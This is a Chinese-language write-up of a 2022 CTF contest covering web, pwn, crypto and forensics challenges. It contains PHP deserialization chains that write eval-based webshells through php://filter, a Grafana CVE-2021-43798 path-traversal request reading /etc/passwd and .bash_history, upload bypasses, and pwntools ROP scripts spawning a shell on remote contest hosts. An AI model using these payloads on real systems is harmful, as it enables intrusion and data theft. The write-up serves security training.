首届“天权信安&catf1ag”网络安全联合公开赛writeup
2022-12-9 18:21:14 Author: Eightbit(查看原文) 阅读量:107 收藏

第一次联合作战效果还可以,各位师傅辛苦。

ezlogin

dirsearch扫描发现如下了路径:

请求robots.txt 发现存在 imdex.php/路径

存在路径:/imdex.php?way=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

变量传参为两次base64加密和一次hex加密

构造flag.php文件的加密形式为:TmpZMll6WXhOamN5WlRjd05qZzNNQT09

获取出题人如下嘲讽图片

提示中存在尝试请求 source.php http://87c2d2e6.clsadp.com/imdex.php?way=TnpNMlpqYzFOekkyTXpZMU1tVTNNRFk0TnpBPQ==

获取反序列化代码:

  1. <?php

  2. error_reporting(0);

  3. highlight_file(__FILE__);

  4. class A{

  5.     public $hello;

  6.     public function __construct(){

  7.         $this->hello = new C;

  8.     }

  9.     public function __toString(){

  10.         if (isset($this->hello)){

  11.             return $this->hello->world();

  12.         }else{

  13.             return "Are you ok? Small dog";

  14.         }

  15.     }

  16. }

  17. class B{ 

  18.     public $file;

  19.     public $text;

  20.     public function __construct($file='',$text='') {

  21.         $this -> file = $file;

  22.         $this -> text = $text;

  23.     }

  24.     public function world(){

  25.         $d   = '<?php die("886");?>';

  26.         $a= $d. $this->text;

  27.          file_put_contents($this-> file,$a);

  28.     }

  29. }

  30. class C{

  31.     public function world(){

  32.         return "Hello,world!";

  33.     }

  34. }

  35.     $cmd=$_GET['cmd']; 

  36.     if(isset($cmd)){

  37.         echo $IO = unserialize($cmd);

  38.     }

  39.     else{

  40.         echo "where is your chain?";

  41.     }

  42. ?> where is your chain?

分析源码构造exp如下:

  1. <?php

  2. class B

  3. {

  4. public $file;

  5. public $text;

  6. public function __construct($file='',$text='') {

  7. $this -> file = $file;

  8. $this -> text = $text;

  9. }

  10. public function world(){

  11. $d = '<?php die("886");?>';

  12. $a= $d. $this->text;

  13. file_put_contents($this-> file,$a);

  14. }

  15. }

  16. class A

  17. {

  18. public $hello;

  19. public function __construct(){

  20. $this->hello = new B;

  21. }

  22. public function __toString(){

  23. if (isset($this->hello)){

  24. return $this->hello->world();

  25. }else{

  26. return "Are you ok? Small dog";

  27. }

  28. }

  29. }

  30. $obj = new A();

  31. $obj->hello->file = "php://filter/write=convert.base64-decode/resource=123.php";

  32. $obj->hello->text = "888PD9waHAgQGV2YWwoJF9QT1NUWzEyM10pOz8+";

  33. $data = serialize($obj);

  34. echo $data;

  35. // echo unserialize($data);

生成payload:

  1. http://dde73561.clsadp.com/surprise/source.php?cmd=O%3A1%3A%22A%22%3A1%3A%7Bs%3A5%3A%22hello%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3D123.php%22%3Bs%3A4%3A%22text%22%3Bs%3A39%3A%22888PD9waHAgQGV2YWwoJF9QT1NUWzEyM10pOz8%2B%22%3B%7D%7D

写入shell执行获取flag

flag{f4250818bc1767bea59d541b175f6e58}

POP

分析源码构造如下exp:

  1. <?php

  2. class catf1ag1{

  3. public $hzy;

  4. public $arr;

  5. function show(){

  6. show_source(__FILE__);

  7. }

  8. function __wakeup(){

  9. foreach($this->arr as $k => $v){

  10. echo $this->hzy->$v;

  11. echo "</br>hzy是社么鬼???";

  12. }

  13. }

  14. }

  15. class catf1ag2{

  16. public $file;

  17. public $txt = '';

  18. function __get($key){

  19. if($key == 'pputut'){

  20. return $this->pputut();

  21. }else{

  22. return '<p>'.htmlspecialchars($key).'</p >';

  23. }

  24. }

  25. function pputut(){

  26. if( strpos($this->file,'../') !== false ||

  27. strpos($this->file,'\\') !== false

  28. ) die();

  29. $content = '<?php die(\'stupid\'); ?>';

  30. echo "NICE!!!,来自wsy赠送的小红花</br>";

  31. $content .= $this->txt;

  32. file_put_contents($this->file, $content);

  33. return htmlspecialchars($content);

  34. }

  35. }

  36. $a=new catf1ag1();

  37. $a->arr=array("pputut");

  38. $a->hzy=new catf1ag2();

  39. $a->hzy->file="php://filter/write=convert.base64-decode/resource=2.php";

  40. $a->hzy->txt='PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+';

  41. echo base64_encode(serialize($a));

history

请求发现是个Grafana应用,直接找到CVE-2021-43798任意文件读取

/public/plugins/postgres/../../../../../../../../etc/passwd

存在Grafana账户,根据提示黑客没有清理,所以直接访问当前用户家目录.bash_history

/public/plugins/postgres/../../../../../../../../home/grafana/.bash_history

直接读取flag

fileupload

提示中存在如下源码:

  1. error_reporting(0);

  2. $text = $_GET['text'];

  3. if(preg_match('[<>?]', $text)) {

  4. die('error!');

  5. }

  6. if(!is_array($text) and isset($text))

  7. {

  8. echo "<div>Your f* put content is ".$text."</div>";

  9. }

  10. else

  11. {

  12. if(file_put_contents('/tmp/input.php', $text)){

  13. include_once("include/f1ag_1s_n0t_here.php");

  14. }

  15. }

访问当前路径include/f1ag1sn0t_here.php 发现上传接口

这里只允许上传jpg图片,直接上传图片马先试试

发现上传文件名直接被改名了,这里看到源码,不知道更名后缀的格式,也尝试了简单爆破

这里最终经过不断尝试发现可以构造后缀名文件不被更名且能被解析

最终构造readme.md文件上传成功且被解析

一开始没搞懂是个啥玩意 原来路径下写了一个.htaccess文件

easyrsa

  1. d = 12344766091434434733173074189627377553017680360356962089159282442350343171988536143126785315325155784049041041740294461592715296364871912847202681353107182427067350160760722505537695351060872358780516757652343767211907987297081728669843916949983336698385141593880433674937737932158161117039734886760063825649623992179585362400642056715249145349214196969590250787495038347519927017407204272334005860911299915001920451629055970214564924913446260348649062607855669069184216149660211811217616624622378241195643396616228441026080441013816066477785035557421235574948446455413760957154157952685181318232685147981777529010093

  2. c = 11665709552346194520404644475693304343544277312139717618599619856028953672850971126750357095315011211770308088484683204061365343120233905810281045824420833988717463919084545209896116273241788366262798828075566212041893949256528106615605492953529332060374278942243879658004499423676775019309335825331748319484916607746676069594715000075912334306124627379144493327297854542488373589404460931325101587726363963663368593838684601095345900109519178235587636259017532403848656471367893974805399463278536349688131608183835495334912159111202418065161491440462011639125641718883550113983387585871212805400726591849356527011578

  3. n = 13717871972706962868710917190864395318380380788726354755874864666298971471295805029284299459288616488109296891203921497014120460143184810218680538647923519587681857800257311678203773339140281665350877914208278709865995451845445601706352659259559793431372688075659019308448963678380545045143583181131530985665822655263963917413080872997526445384954610888776917323156325542921415838122754036103689148810677276471252057077595104724365967333418002158480223657363936976281758713027828747277980907153645847605403914070601944617432177385048803228970693240587900504431163155958465431312258451026447435473865563581029300541109

  4. m = pow(c, d, n)

  5. print(m)

  6. from Crypto.Util.number import *

  7. print(long_to_bytes(m))

xor

1.简单的异或

  1. catf1ag{nine-[email protected][email protected]/!}

md5

直接cmd5查到

checkin

Ida分析

明显整数溢出,负数绕过atoi,但是会校验第一个字节是不是负号,添加一个空格绕过即可

  1. Exp

  2. from pwn import *

  3. context(arch = 'amd64', os = 'linux', log_level = 'debug')

  4. #p = process('./checkin')

  5. p = remote('180.76.166.28', 6000)

  6. elf = ELF('checkin')

  7. #libc = ELF('./libc-2.31.so')

  8. puts_addr = 0x4006b0

  9. flag = 0x6010c0

  10. pop_rdi_ret = 0x400a53

  11. p.recvuntil('name: \n')

  12. p.send('aaaaaaaaaaaaaaaa')

  13. p.recvuntil('size: \n')

  14. #gdb.attach(p)

  15. p.send(' -1a')

  16. sleep(0.3)

  17. payload = b'a'*0x58 + p64(pop_rdi_ret) + p64(flag) + p64(puts_addr)

  18. p.sendline(payload)

  19. p.interactive()

ezpwn

查看保护

Ida分析程序,题目有三段输入,两断read,中间为两个scanf,进入最后one_punch后排布如下

则利用溢出结合libccsuinit中的6pop_ret形成ROP

这里有一个点,从泄露的地址来看远程环境的libc应该是GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.9),但是题目给的是GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2),离谱

exp:

  1. Exp

  2. from pwn import *

  3. context(arch = 'amd64', os = 'linux', log_level = 'debug')

  4. #p = process('./pwn2')

  5. p = remote('180.76.166.28', 13000)

  6. elf = ELF('pwn2')

  7. libc = ELF('./libc-2.31.so')

  8. read_got = 0x404030

  9. puts_plt = 0x401090

  10. main_addr = 0x4010f0

  11. ret_addr = 0x40101a

  12. pop_rdi_ret = 0x401413

  13. csu1 = 0x40140b

  14. csu2 = 0x401410

  15. bss = 0x404260

  16. p.recvuntil('something...\n')

  17. payload = p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(main_addr)

  18. #gdb.attach(p)

  19. p.sendline(payload)

  20. p.recvuntil('[1] damage:')

  21. p.sendline(str(11111111))

  22. p.recvuntil('[2] damage:')

  23. payload = b'a'*0x18 + p64(ret_addr)

  24. p.sendline(str(4199440))

  25. p.recvuntil('ONE PUNCH ------------>')

  26. payload = b'a'*0x10 + p64(bss) + p64(csu1)

  27. p.send(payload)

  28. libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['read']

  29. log.success('libc_base:' + hex(libc_base))

  30. system_addr = libc_base + libc.sym['system']

  31. bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

  32. p.recvuntil('something...\n')

  33. payload = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) + p64(main_addr)

  34. #gdb.attach(p)

  35. p.send(payload)

  36. p.recvuntil('[1] damage:')

  37. p.sendline(str(11111111))

  38. p.recvuntil('[2] damage:')

  39. payload = b'a'*0x18 + p64(ret_addr)

  40. p.sendline(str(4199440))

  41. p.recvuntil('ONE PUNCH ------------>')

  42. payload = b'a'*0x18 + p64(csu1)

  43. p.send(payload)

  44. p.interactive()

angr

自带后门

  1. flag{850e941d-5095-4a28-89b3-8c3f8fc2e413}

简单隐写

1.binwalk分离出一个带密码的rar,尝试爆破未果

2.重新分析给的图片,通过JPHS分离出rar的密码

  1. catf1agcatf1agcatf1ag

3.解压压缩包,凯撒得到

  1. dbug1bh{KQit_x1o_Z0v_H3u_JU!!!}

  2. #catf1ag{JPhs_w1n_Y0u_G3t_IT!!!}

十位马

1.分析所给的图片,发现有很多png

2.导出开始拼图,最后是用美图秀秀拼完的,中间有几个顺序是有问题的,需要人工调整一下

6.补齐二维码,扫描得到flag

  1. flag{cbef4c93-5e9c-11ed-8205-666c80085daf}

阿sir

1.取证,但是镜像有密码,查看hint,为0宽隐写,解密得到解压密码the password is 13345wewang

2.通过取证大师分析,得到桌面的图片

3.分析lbj.png图片,可以看到尾部附加了异常数据

  1. 提取出来是G5XTA3l=

  2. G5XTA3L=

  3. base327o0m,这边有点坑,明明是0x6c小写l,但是需要转成大写

4.通过取证大师继续寻找,找到两个云盘文件

  1. https://pan.baidu.com/share/init?surl=x4dTDJrZfqWbxJD3RNH4cg

  2. https://pan.baidu.com/share/init?surl=zaffD7hzZSSdiw71xx0v0A

5.通过第三步的密码7o0m,下载到云盘文件,有压缩包和一个key文件,压缩包解压后分析文件

6.根据时间排列,得到密码the password is welcometianquan

  1. 121 109 106 32 32 117 102 120 120 98 116 119 105 32 110 120 32 98 106 113 104 116 114 106 121 110 102 115 118 122 102 115

7.lsb隐写,得到flag

  1. flag{quzheng_yyds!!!!}

Eightbit 致力于寻找一群热爱技术、热爱分享的大佬师傅们,组建一个简单的圈子。简单到在这个的圈子里大家没有任何利益,没有任何冲突,大家只有一个简单的夙愿,就是在一起交流交流技术,交流交流想法,一起开心的吹吹水就好。我们交流的内容主要在网络安全方向,包括但不限于web安全、内网渗透、免杀、逆向分析、二进制分析、移动逆向分析、安全竞赛等。不论你是大佬、还是一个憧憬进入网络安全圈子的新秀,大家在技术面前都是平等的,我们都可以一切交流学习。有想法的师傅们可以加入我们的交流群一起交流哦~


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MTA3MjMxNA==&mid=2247487381&idx=1&sn=bc74b3cad5b7b1765d38374ec66a19fa&chksm=cfd3b5c0f8a43cd64d1d73592bfb28a7dcbf3423811e77111146a0cf6626d81f7b28ed22c259#rd
如有侵权请联系:admin#unsafe.sh